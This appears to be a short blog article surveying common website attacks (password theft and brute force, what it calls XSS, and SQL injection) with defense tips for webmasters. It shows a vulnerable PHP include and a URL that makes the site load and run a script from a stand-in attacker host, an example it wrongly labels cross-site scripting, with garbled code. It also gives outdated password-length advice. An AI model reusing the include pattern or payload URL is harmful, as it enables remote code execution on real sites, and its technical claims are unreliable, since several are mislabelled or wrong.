Here are the most common techniques used to hack a website

Hacking sites that are least protected by password – By pass authentication

It’s the webmaster’s nightmare, hackers accessing the site using stolen passwords which should be under control. Usually hackers will be well known persons who they know. They use various techniques to steal the password. They access their emails; they use key loggers or network sniffers to identify the password which they use for their day to day work.

Hackers can also use techniques such as brute force attack (dictionary attacks) etc and can find the weak passwords. The more the complex password, the more difficult for hackers to identify the password using this method.

How to defend

  • It’s advised to have the passwords made of capital letters, small letters, numbers and symbols and should be at least 6-10 digits long.
  • Change the passwords at frequent interval
  • Don’t store the passwords in email
  • Use the latest antivirus software to make sure that the system is free of key loggers

XSS or the cross site scripting

In this method hacker again access to your website using previously disclosed or undisclosed security vulnerability of the server software or the scripting language. Hackers try to execute a code hosted on a remote computer and will access the secure areas of the websites.

For example in Apache/ php if you try to include a page like this

#include $_GET[page];

And use the get request to include aboutus.php like this http://yoursite.php/?page=aboutus. Hackers can execute remotely hosted page like this http://yoursiite.com/?page=http://hackerssite.com/directorylist.php

This method is the simplest and many variations of the following the methods are there, like using intercepting JavaScript and execute XSS attacks. Now a day it’s too common as the webmasters more towards web2.0 techniques and using loosely coded AJAX techniques.

Read more at http://en.wikipedia.org/wiki/Cross-site_scripting

How to defend

  • Aware of the XSS attacks happening around
  • Update the web server software and server scripting language
  • Disable unwanted service from server software

SQL injection

In this type of attack, hackers take advantage of the comprised database. Hackers inject carefully written SQL codes through the forms available on the website. [registration, feedback form etc]. read more about these type of attach here

http://www.unixwiz.net/techtips/sql-injection.html

http://en.wikipedia.org/wiki/SQL_injection

Ways to protect

  • Clean up the inputs before inserting to the database
  • Properly escape input strings

Explore More

Cyber Attacks to Myanmar Media Sites

Last September 28, BurmeseHackers Group Hacked Irrawaddy Online Store twice, and we’ve been discussed about that. After a month, 27/09/2010: Irrawaddy, Mizzima and the Democratic Voice of Burma (DVB), were

Batten down the Hatches—10-Minute Tactics

The simplest way to defend your computer quickly against hackers is to use a firewall. So let’s look at your two fastest options. Either can be done in 10 minutes.Turn

What are worms?

Worms are programs that replicate themselves from one system to another without using a host file. Although in most cases worms exist inside files, such as Word or Excel documents,